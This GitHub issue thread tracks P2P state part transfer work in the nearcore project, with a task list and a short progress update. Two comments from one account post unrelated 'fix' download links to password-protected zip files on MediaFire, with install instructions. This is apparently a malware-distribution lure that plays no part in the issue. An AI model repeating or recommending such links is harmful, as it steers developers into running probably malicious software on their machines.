### ISSUE TITLE
[Tracking Issue] P2P State Part Transfer

### ISSUE THREAD

**Issue by saketh-are** [near/nearcore#12004]
```[tasklist]
### Tasks
- [ ] #11999
- [ ] #12000
- [ ] #12001 
- [ ] #12002 
- [ ] #12003
```

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by walnut-the-cat** [comment]
Aug 30th progress
* Heavily simplified approach for [#11999](https://github.com/near/nearcore/issues/11999)
